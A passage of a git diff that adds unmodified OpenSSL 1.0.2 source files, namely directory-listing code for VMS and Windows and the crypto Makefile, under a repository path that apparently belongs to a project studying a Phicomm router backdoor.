+        if (*ctx == NULL) {
+            errno = ENOMEM;
+            return 0;
+        }
+        memset(*ctx, '\0', sizeof(LP_DIR_CTX));
+
+        strcpy((*ctx)->filespec, directory);
+        strcat((*ctx)->filespec, "*.*;");
+
+/* Arrange 32-bit pointer to (copied) string storage, if needed. */
+#if __INITIAL_POINTER_SIZE == 64
+# define CTX_FILESPEC ctx_filespec_32p
+        /* Copy the file name to storage with a 32-bit pointer. */
+        ctx_filespec_32p = ctx_filespec_32;
+        strcpy(ctx_filespec_32p, (*ctx)->filespec);
+#else                           /* __INITIAL_POINTER_SIZE == 64 */
+# define CTX_FILESPEC (*ctx)->filespec
+#endif                          /* __INITIAL_POINTER_SIZE == 64 [else] */
+
+        (*ctx)->filespec_dsc.dsc$w_length = filespeclen;
+        (*ctx)->filespec_dsc.dsc$b_dtype = DSC$K_DTYPE_T;
+        (*ctx)->filespec_dsc.dsc$b_class = DSC$K_CLASS_S;
+        (*ctx)->filespec_dsc.dsc$a_pointer = CTX_FILESPEC;
+    }
+
+    (*ctx)->result_dsc.dsc$w_length = 0;
+    (*ctx)->result_dsc.dsc$b_dtype = DSC$K_DTYPE_T;
+    (*ctx)->result_dsc.dsc$b_class = DSC$K_CLASS_D;
+    (*ctx)->result_dsc.dsc$a_pointer = 0;
+
+    status = lib$find_file(&(*ctx)->filespec_dsc, &(*ctx)->result_dsc,
+                           &(*ctx)->VMS_context, 0, 0, 0, &flags);
+
+    if (status == RMS$_NMF) {
+        errno = 0;
+        vaxc$errno = status;
+        return NULL;
+    }
+
+    if (!$VMS_STATUS_SUCCESS(status)) {
+        errno = EVMSERR;
+        vaxc$errno = status;
+        return NULL;
+    }
+
+    /*
+     * Quick, cheap and dirty way to discard any device and directory, since
+     * we only want file names
+     */
+    l = (*ctx)->result_dsc.dsc$w_length;
+    p = (*ctx)->result_dsc.dsc$a_pointer;
+    r = p;
+    for (; *p; p++) {
+        if (*p == '^' && p[1] != '\0') { /* Take care of ODS-5 escapes */
+            p++;
+        } else if (*p == ':' || *p == '>' || *p == ']') {
+            l -= p + 1 - r;
+            r = p + 1;
+        } else if (*p == ';') {
+            l = p - r;
+            break;
+        }
+    }
+
+    strncpy((*ctx)->result, r, l);
+    (*ctx)->result[l] = '\0';
+    str$free1_dx(&(*ctx)->result_dsc);
+
+    return (*ctx)->result;
+}
+
+int LP_find_file_end(LP_DIR_CTX **ctx)
+{
+    if (ctx != NULL && *ctx != NULL) {
+        int status = lib$find_file_end(&(*ctx)->VMS_context);
+
+        free(*ctx);
+
+        if (!$VMS_STATUS_SUCCESS(status)) {
+            errno = EVMSERR;
+            vaxc$errno = status;
+            return 0;
+        }
+        return 1;
+    }
+    errno = EINVAL;
+    return 0;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/LPdir_win.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/LPdir_win.c
new file mode 100644
index 0000000..07e63fb
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/LPdir_win.c
@@ -0,0 +1,170 @@
+/*
+ * Copyright (c) 2004, Richard Levitte <richard@levitte.org>
+ * All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
+ * ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
+ * LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
+ * A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
+ * OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
+ * LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
+ * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
+ * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
+ * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
+ * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+ */
+#include <windows.h>
+#include <tchar.h>
+#ifndef LPDIR_H
+# include "LPdir.h"
+#endif
+
+/*
+ * We're most likely overcautious here, but let's reserve for broken WinCE
+ * headers and explicitly opt for UNICODE call. Keep in mind that our WinCE
+ * builds are compiled with -DUNICODE [as well as -D_UNICODE].
+ */
+#if defined(LP_SYS_WINCE) && !defined(FindFirstFile)
+# define FindFirstFile FindFirstFileW
+#endif
+#if defined(LP_SYS_WINCE) && !defined(FindNextFile)
+# define FindNextFile FindNextFileW
+#endif
+
+#ifndef NAME_MAX
+# define NAME_MAX 255
+#endif
+
+struct LP_dir_context_st {
+    WIN32_FIND_DATA ctx;
+    HANDLE handle;
+    char entry_name[NAME_MAX + 1];
+};
+
+const char *LP_find_file(LP_DIR_CTX **ctx, const char *directory)
+{
+    if (ctx == NULL || directory == NULL) {
+        errno = EINVAL;
+        return 0;
+    }
+
+    errno = 0;
+    if (*ctx == NULL) {
+        const char *extdir = directory;
+        char *extdirbuf = NULL;
+        size_t dirlen = strlen(directory);
+
+        if (dirlen == 0) {
+            errno = ENOENT;
+            return 0;
+        }
+
+        *ctx = (LP_DIR_CTX *)malloc(sizeof(LP_DIR_CTX));
+        if (*ctx == NULL) {
+            errno = ENOMEM;
+            return 0;
+        }
+        memset(*ctx, '\0', sizeof(LP_DIR_CTX));
+
+        if (directory[dirlen - 1] != '*') {
+            extdirbuf = (char *)malloc(dirlen + 3);
+            if (extdirbuf == NULL) {
+                free(*ctx);
+                *ctx = NULL;
+                errno = ENOMEM;
+                return 0;
+            }
+            if (directory[dirlen - 1] != '/' && directory[dirlen - 1] != '\\')
+                extdir = strcat(strcpy(extdirbuf, directory), "/*");
+            else
+                extdir = strcat(strcpy(extdirbuf, directory), "*");
+        }
+
+        if (sizeof(TCHAR) != sizeof(char)) {
+            TCHAR *wdir = NULL;
+            /* len_0 denotes string length *with* trailing 0 */
+            size_t index = 0, len_0 = strlen(extdir) + 1;
+
+            wdir = (TCHAR *)calloc(len_0, sizeof(TCHAR));
+            if (wdir == NULL) {
+                if (extdirbuf != NULL) {
+                    free(extdirbuf);
+                }
+                free(*ctx);
+                *ctx = NULL;
+                errno = ENOMEM;
+                return 0;
+            }
+#ifdef LP_MULTIBYTE_AVAILABLE
+            if (!MultiByteToWideChar
+                (CP_ACP, 0, extdir, len_0, (WCHAR *)wdir, len_0))
+#endif
+                for (index = 0; index < len_0; index++)
+                    wdir[index] = (TCHAR)extdir[index];
+
+            (*ctx)->handle = FindFirstFile(wdir, &(*ctx)->ctx);
+
+            free(wdir);
+        } else {
+            (*ctx)->handle = FindFirstFile((TCHAR *)extdir, &(*ctx)->ctx);
+        }
+        if (extdirbuf != NULL) {
+            free(extdirbuf);
+        }
+
+        if ((*ctx)->handle == INVALID_HANDLE_VALUE) {
+            free(*ctx);
+            *ctx = NULL;
+            errno = EINVAL;
+            return 0;
+        }
+    } else {
+        if (FindNextFile((*ctx)->handle, &(*ctx)->ctx) == FALSE) {
+            return 0;
+        }
+    }
+    if (sizeof(TCHAR) != sizeof(char)) {
+        TCHAR *wdir = (*ctx)->ctx.cFileName;
+        size_t index, len_0 = 0;
+
+        while (wdir[len_0] && len_0 < (sizeof((*ctx)->entry_name) - 1))
+            len_0++;
+        len_0++;
+
+#ifdef LP_MULTIBYTE_AVAILABLE
+        if (!WideCharToMultiByte
+            (CP_ACP, 0, (WCHAR *)wdir, len_0, (*ctx)->entry_name,
+             sizeof((*ctx)->entry_name), NULL, 0))
+#endif
+            for (index = 0; index < len_0; index++)
+                (*ctx)->entry_name[index] = (char)wdir[index];
+    } else
+        strncpy((*ctx)->entry_name, (const char *)(*ctx)->ctx.cFileName,
+                sizeof((*ctx)->entry_name) - 1);
+
+    (*ctx)->entry_name[sizeof((*ctx)->entry_name) - 1] = '\0';
+
+    return (*ctx)->entry_name;
+}
+
+int LP_find_file_end(LP_DIR_CTX **ctx)
+{
+    if (ctx != NULL && *ctx != NULL) {
+        FindClose((*ctx)->handle);
+        free(*ctx);
+        *ctx = NULL;
+        return 1;
+    }
+    errno = EINVAL;
+    return 0;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/LPdir_win32.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/LPdir_win32.c
new file mode 100644
index 0000000..b1c983d
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/LPdir_win32.c
@@ -0,0 +1,33 @@
+/*
+ * $LP: LPlib/source/LPdir_win32.c,v 1.3 2004/08/26 13:36:05 _cvs_levitte Exp
+ * $
+ */
+/*
+ * Copyright (c) 2004, Richard Levitte <richard@levitte.org>
+ * All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
+ * ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
+ * LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
+ * A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
+ * OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
+ * LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
+ * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
+ * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
+ * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
+ * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+ */
+
+#define LP_SYS_WIN32
+#define LP_MULTIBYTE_AVAILABLE
+#include "LPdir_win.c"
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/LPdir_wince.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/LPdir_wince.c
new file mode 100644
index 0000000..ae8a56f
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/LPdir_wince.c
@@ -0,0 +1,36 @@
+/*
+ * $LP: LPlib/source/LPdir_wince.c,v 1.3 2004/08/26 13:36:05 _cvs_levitte Exp
+ * $
+ */
+/*
+ * Copyright (c) 2004, Richard Levitte <richard@levitte.org>
+ * All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
+ * ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
+ * LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
+ * A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
+ * OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
+ * LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
+ * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
+ * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
+ * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
+ * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+ */
+
+#define LP_SYS_WINCE
+/*
+ * We might want to define LP_MULTIBYTE_AVAILABLE here.  It's currently under
+ * investigation what the exact conditions would be
+ */
+#include "LPdir_win.c"
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/Makefile b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/Makefile
new file mode 100644
index 0000000..9a39e93
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/Makefile
@@ -0,0 +1,216 @@
+#
+# OpenSSL/crypto/Makefile
+#
+
+DIR=		crypto
+TOP=		..
+CC=		cc
+INCLUDE=	-I. -I$(TOP) -I../include $(ZLIB_INCLUDE)
+# INCLUDES targets sudbirs!
+INCLUDES=	-I.. -I../.. -I../modes -I../asn1 -I../evp -I../../include $(ZLIB_INCLUDE)
+CFLAG=		-g
+MAKEDEPPROG=	makedepend
+MAKEDEPEND=	$(TOP)/util/domd $(TOP) -MD $(MAKEDEPPROG)
+MAKEFILE=       Makefile
+RM=             rm -f
+AR=		ar r
+
+RECURSIVE_MAKE=	[ -n "$(SDIRS)" ] && for i in $(SDIRS) ; do \
+		    (cd $$i && echo "making $$target in $(DIR)/$$i..." && \
+		    $(MAKE) -e TOP=../.. DIR=$$i INCLUDES='$(INCLUDES)' $$target ) || exit 1; \
+		done;
+
+PEX_LIBS=
+EX_LIBS=
+ 
+CFLAGS= $(INCLUDE) $(CFLAG)
+ASFLAGS= $(INCLUDE) $(ASFLAG)
+AFLAGS=$(ASFLAGS)
+CPUID_OBJ=mem_clr.o
+
+LIBS=
+
+GENERAL=Makefile README crypto-lib.com install.com
+TEST=constant_time_test.c
+
+LIB= $(TOP)/libcrypto.a
+SHARED_LIB= libcrypto$(SHLIB_EXT)
+LIBSRC=	cryptlib.c mem.c mem_clr.c mem_dbg.c cversion.c ex_data.c cpt_err.c \
+	ebcdic.c uid.c o_time.c o_str.c o_dir.c o_fips.c o_init.c fips_ers.c
+LIBOBJ= cryptlib.o mem.o mem_dbg.o cversion.o ex_data.o cpt_err.o ebcdic.o \
+	uid.o o_time.o o_str.o o_dir.o o_fips.o o_init.o fips_ers.o $(CPUID_OBJ)
+
+SRC= $(LIBSRC)
+
+EXHEADER= crypto.h opensslv.h opensslconf.h ebcdic.h symhacks.h \
+	ossl_typ.h
+HEADER=	cryptlib.h buildinf.h md32_common.h o_time.h o_str.h o_dir.h \
+	constant_time_locl.h $(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	@(cd ..; $(MAKE) DIRS=$(DIR) all)
+
+all: shared
+
+buildinf.h: ../Makefile
+	$(PERL) $(TOP)/util/mkbuildinf.pl "$(CC) $(CFLAGS)" "$(PLATFORM)" >buildinf.h
+
+x86cpuid.s:	x86cpuid.pl perlasm/x86asm.pl
+	$(PERL) x86cpuid.pl $(PERLASM_SCHEME) $(CFLAGS) $(PROCESSOR) > $@
+
+applink.o:	$(TOP)/ms/applink.c
+	$(CC) $(CFLAGS) -c -o $@ $(TOP)/ms/applink.c
+
+uplink.o:	$(TOP)/ms/uplink.c applink.o
+	$(CC) $(CFLAGS) -c -o $@ $(TOP)/ms/uplink.c
+
+uplink-x86.s:	$(TOP)/ms/uplink-x86.pl
+	$(PERL) $(TOP)/ms/uplink-x86.pl $(PERLASM_SCHEME) > $@
+
+x86_64cpuid.s: x86_64cpuid.pl;	$(PERL) x86_64cpuid.pl $(PERLASM_SCHEME) > $@
+ia64cpuid.s: ia64cpuid.S;	$(CC) $(CFLAGS) -E ia64cpuid.S > $@
+ppccpuid.s:	ppccpuid.pl;	$(PERL) ppccpuid.pl $(PERLASM_SCHEME) $@
+pariscid.s:	pariscid.pl;	$(PERL) pariscid.pl $(PERLASM_SCHEME) $@
+alphacpuid.s:	alphacpuid.pl
+	(preproc=$$$$.$@.S; trap "rm $$preproc" INT; \
+	$(PERL) alphacpuid.pl > $$preproc && \
+	$(CC) -E -P $$preproc > $@ && rm $$preproc)
+
+testapps:
+	[ -z "$(THIS)" ] || (	if echo $(SDIRS) | fgrep ' des '; \
+				then cd des && $(MAKE) -e des; fi )
+	[ -z "$(THIS)" ] || ( cd pkcs7 && $(MAKE) -e testapps );
+	@if [ -z "$(THIS)" ]; then $(MAKE) -f $(TOP)/Makefile reflect THIS=$@; fi
+
+subdirs:
+	@target=all; $(RECURSIVE_MAKE)
+
+files:
+	$(PERL) $(TOP)/util/files.pl "CPUID_OBJ=$(CPUID_OBJ)" Makefile >> $(TOP)/MINFO
+	@target=files; $(RECURSIVE_MAKE)
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../apps $(APPS)
+	@target=links; $(RECURSIVE_MAKE)
+
+# lib: $(LIB): are splitted to avoid end-less loop
+lib:	$(LIB)
+	@touch lib
+$(LIB):	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	test -z "$(FIPSLIBDIR)" || $(AR) $(LIB) $(FIPSLIBDIR)fipscanister.o
+	$(RANLIB) $(LIB) || echo Never mind.
+
+shared: buildinf.h lib subdirs
+	if [ -n "$(SHARED_LIBS)" ]; then \
+		(cd ..; $(MAKE) $(SHARED_LIB)); \
+	fi
+
+libs:
+	@target=lib; $(RECURSIVE_MAKE)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ;\
+	do \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+	@target=install; $(RECURSIVE_MAKE)
+
+lint:
+	@target=lint; $(RECURSIVE_MAKE)
+
+depend:
+	@[ -z "$(THIS)" -o -f buildinf.h ] || touch buildinf.h # fake buildinf.h if it does not exist
+	@[ -z "$(THIS)" ] || $(MAKEDEPEND) -- $(CFLAG) $(INCLUDE) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
+	@[ -z "$(THIS)" -o -s buildinf.h ] || rm buildinf.h
+	@[ -z "$(THIS)" ] || (set -e; target=depend; $(RECURSIVE_MAKE) )
+	@if [ -z "$(THIS)" ]; then $(MAKE) -f $(TOP)/Makefile reflect THIS=$@; fi
+
+clean:
+	rm -f buildinf.h *.s *.o */*.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+	@target=clean; $(RECURSIVE_MAKE)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+	rm -f opensslconf.h
+	@target=dclean; $(RECURSIVE_MAKE)
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+cpt_err.o: ../include/openssl/bio.h ../include/openssl/crypto.h
+cpt_err.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+cpt_err.o: ../include/openssl/lhash.h ../include/openssl/opensslconf.h
+cpt_err.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+cpt_err.o: ../include/openssl/safestack.h ../include/openssl/stack.h
+cpt_err.o: ../include/openssl/symhacks.h cpt_err.c
+cryptlib.o: ../e_os.h ../include/openssl/bio.h ../include/openssl/buffer.h
+cryptlib.o: ../include/openssl/crypto.h ../include/openssl/e_os2.h
+cryptlib.o: ../include/openssl/err.h ../include/openssl/lhash.h
+cryptlib.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+cryptlib.o: ../include/openssl/ossl_typ.h ../include/openssl/safestack.h
+cryptlib.o: ../include/openssl/stack.h ../include/openssl/symhacks.h cryptlib.c
+cryptlib.o: cryptlib.h
+cversion.o: ../e_os.h ../include/openssl/bio.h ../include/openssl/buffer.h
+cversion.o: ../include/openssl/crypto.h ../include/openssl/e_os2.h
+cversion.o: ../include/openssl/err.h ../include/openssl/lhash.h
+cversion.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+cversion.o: ../include/openssl/ossl_typ.h ../include/openssl/safestack.h
+cversion.o: ../include/openssl/stack.h ../include/openssl/symhacks.h buildinf.h
+cversion.o: cryptlib.h cversion.c
+ebcdic.o: ../include/openssl/e_os2.h ../include/openssl/opensslconf.h ebcdic.c
+ex_data.o: ../e_os.h ../include/openssl/bio.h ../include/openssl/buffer.h
+ex_data.o: ../include/openssl/crypto.h ../include/openssl/e_os2.h
+ex_data.o: ../include/openssl/err.h ../include/openssl/lhash.h
+ex_data.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+ex_data.o: ../include/openssl/ossl_typ.h ../include/openssl/safestack.h
+ex_data.o: ../include/openssl/stack.h ../include/openssl/symhacks.h cryptlib.h
+ex_data.o: ex_data.c
+fips_ers.o: ../include/openssl/opensslconf.h fips_ers.c
+mem.o: ../e_os.h ../include/openssl/bio.h ../include/openssl/buffer.h
+mem.o: ../include/openssl/crypto.h ../include/openssl/e_os2.h
+mem.o: ../include/openssl/err.h ../include/openssl/lhash.h
+mem.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+mem.o: ../include/openssl/ossl_typ.h ../include/openssl/safestack.h
+mem.o: ../include/openssl/stack.h ../include/openssl/symhacks.h cryptlib.h
+mem.o: mem.c
+mem_clr.o: ../include/openssl/crypto.h ../include/openssl/e_os2.h
+mem_clr.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+mem_clr.o: ../include/openssl/ossl_typ.h ../include/openssl/safestack.h
+mem_clr.o: ../include/openssl/stack.h ../include/openssl/symhacks.h mem_clr.c
+mem_dbg.o: ../e_os.h ../include/openssl/bio.h ../include/openssl/buffer.h
+mem_dbg.o: ../include/openssl/crypto.h ../include/openssl/e_os2.h
+mem_dbg.o: ../include/openssl/err.h ../include/openssl/lhash.h
+mem_dbg.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+mem_dbg.o: ../include/openssl/ossl_typ.h ../include/openssl/safestack.h
+mem_dbg.o: ../include/openssl/stack.h ../include/openssl/symhacks.h cryptlib.h
+mem_dbg.o: mem_dbg.c
+o_dir.o: ../e_os.h ../include/openssl/e_os2.h ../include/openssl/opensslconf.h
+o_dir.o: LPdir_unix.c o_dir.c o_dir.h
+o_fips.o: ../e_os.h ../include/openssl/bio.h ../include/openssl/buffer.h
+o_fips.o: ../include/openssl/crypto.h ../include/openssl/e_os2.h
+o_fips.o: ../include/openssl/err.h ../include/openssl/lhash.h
+o_fips.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+o_fips.o: ../include/openssl/ossl_typ.h ../include/openssl/safestack.h
+o_fips.o: ../include/openssl/stack.h ../include/openssl/symhacks.h cryptlib.h
+o_fips.o: o_fips.c
+o_init.o: ../e_os.h ../include/openssl/bio.h ../include/openssl/crypto.h
+o_init.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+o_init.o: ../include/openssl/lhash.h ../include/openssl/opensslconf.h
+o_init.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+o_init.o: ../include/openssl/safestack.h ../include/openssl/stack.h
+o_init.o: ../include/openssl/symhacks.h o_init.c
+o_str.o: ../e_os.h ../include/openssl/e_os2.h ../include/openssl/opensslconf.h
+o_str.o: o_str.c o_str.h
+o_time.o: ../include/openssl/e_os2.h ../include/openssl/opensslconf.h o_time.c
+o_time.o: o_time.h
+uid.o: ../include/openssl/crypto.h ../include/openssl/e_os2.h
+uid.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+uid.o: ../include/openssl/ossl_typ.h ../include/openssl/safestack.h
+uid.o: ../include/openssl/stack.h ../include/openssl/symhacks.h uid.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/Makefile.bak b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/Makefile.bak
new file mode 100644
index 0000000..9a39e93
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/Makefile.bak
@@ -0,0 +1,216 @@
+#
+# OpenSSL/crypto/Makefile
+#
+
+DIR=		crypto
+TOP=		..
+CC=		cc
+INCLUDE=	-I. -I$(TOP) -I../include $(ZLIB_INCLUDE)
+# INCLUDES targets sudbirs!
+INCLUDES=	-I.. -I../.. -I../modes -I../asn1 -I../evp -I../../include $(ZLIB_INCLUDE)
+CFLAG=		-g
+MAKEDEPPROG=	makedepend
+MAKEDEPEND=	$(TOP)/util/domd $(TOP) -MD $(MAKEDEPPROG)
+MAKEFILE=       Makefile
+RM=             rm -f
+AR=		ar r
+
+RECURSIVE_MAKE=	[ -n "$(SDIRS)" ] && for i in $(SDIRS) ; do \
+		    (cd $$i && echo "making $$target in $(DIR)/$$i..." && \
+		    $(MAKE) -e TOP=../.. DIR=$$i INCLUDES='$(INCLUDES)' $$target ) || exit 1; \
+		done;
+
+PEX_LIBS=
+EX_LIBS=
+ 
+CFLAGS= $(INCLUDE) $(CFLAG)
+ASFLAGS= $(INCLUDE) $(ASFLAG)
+AFLAGS=$(ASFLAGS)
+CPUID_OBJ=mem_clr.o
+
+LIBS=
+
+GENERAL=Makefile README crypto-lib.com install.com
+TEST=constant_time_test.c
+
+LIB= $(TOP)/libcrypto.a
+SHARED_LIB= libcrypto$(SHLIB_EXT)
+LIBSRC=	cryptlib.c mem.c mem_clr.c mem_dbg.c cversion.c ex_data.c cpt_err.c \
+	ebcdic.c uid.c o_time.c o_str.c o_dir.c o_fips.c o_init.c fips_ers.c
+LIBOBJ= cryptlib.o mem.o mem_dbg.o cversion.o ex_data.o cpt_err.o ebcdic.o \
+	uid.o o_time.o o_str.o o_dir.o o_fips.o o_init.o fips_ers.o $(CPUID_OBJ)
+
+SRC= $(LIBSRC)
+
+EXHEADER= crypto.h opensslv.h opensslconf.h ebcdic.h symhacks.h \
+	ossl_typ.h
+HEADER=	cryptlib.h buildinf.h md32_common.h o_time.h o_str.h o_dir.h \
+	constant_time_locl.h $(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	@(cd ..; $(MAKE) DIRS=$(DIR) all)
+
+all: shared
+
+buildinf.h: ../Makefile
+	$(PERL) $(TOP)/util/mkbuildinf.pl "$(CC) $(CFLAGS)" "$(PLATFORM)" >buildinf.h
+
+x86cpuid.s:	x86cpuid.pl perlasm/x86asm.pl
+	$(PERL) x86cpuid.pl $(PERLASM_SCHEME) $(CFLAGS) $(PROCESSOR) > $@
+
+applink.o:	$(TOP)/ms/applink.c
+	$(CC) $(CFLAGS) -c -o $@ $(TOP)/ms/applink.c
+
+uplink.o:	$(TOP)/ms/uplink.c applink.o
+	$(CC) $(CFLAGS) -c -o $@ $(TOP)/ms/uplink.c
+
+uplink-x86.s:	$(TOP)/ms/uplink-x86.pl
+	$(PERL) $(TOP)/ms/uplink-x86.pl $(PERLASM_SCHEME) > $@
+
+x86_64cpuid.s: x86_64cpuid.pl;	$(PERL) x86_64cpuid.pl $(PERLASM_SCHEME) > $@
+ia64cpuid.s: ia64cpuid.S;	$(CC) $(CFLAGS) -E ia64cpuid.S > $@
+ppccpuid.s:	ppccpuid.pl;	$(PERL) ppccpuid.pl $(PERLASM_SCHEME) $@
+pariscid.s:	pariscid.pl;	$(PERL) pariscid.pl $(PERLASM_SCHEME) $@
+alphacpuid.s:	alphacpuid.pl
+	(preproc=$$$$.$@.S; trap "rm $$preproc" INT; \
+	$(PERL) alphacpuid.pl > $$preproc && \
+	$(CC) -E -P $$preproc > $@ && rm $$preproc)
+
+testapps:
+	[ -z "$(THIS)" ] || (	if echo $(SDIRS) | fgrep ' des '; \
+				then cd des && $(MAKE) -e des; fi )
+	[ -z "$(THIS)" ] || ( cd pkcs7 && $(MAKE) -e testapps );
+	@if [ -z "$(THIS)" ]; then $(MAKE) -f $(TOP)/Makefile reflect THIS=$@; fi
+
+subdirs:
+	@target=all; $(RECURSIVE_MAKE)
+
+files:
+	$(PERL) $(TOP)/util/files.pl "CPUID_OBJ=$(CPUID_OBJ)" Makefile >> $(TOP)/MINFO
+	@target=files; $(RECURSIVE_MAKE)
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../apps $(APPS)
+	@target=links; $(RECURSIVE_MAKE)
+
+# lib: $(LIB): are splitted to avoid end-less loop
+lib:	$(LIB)
+	@touch lib
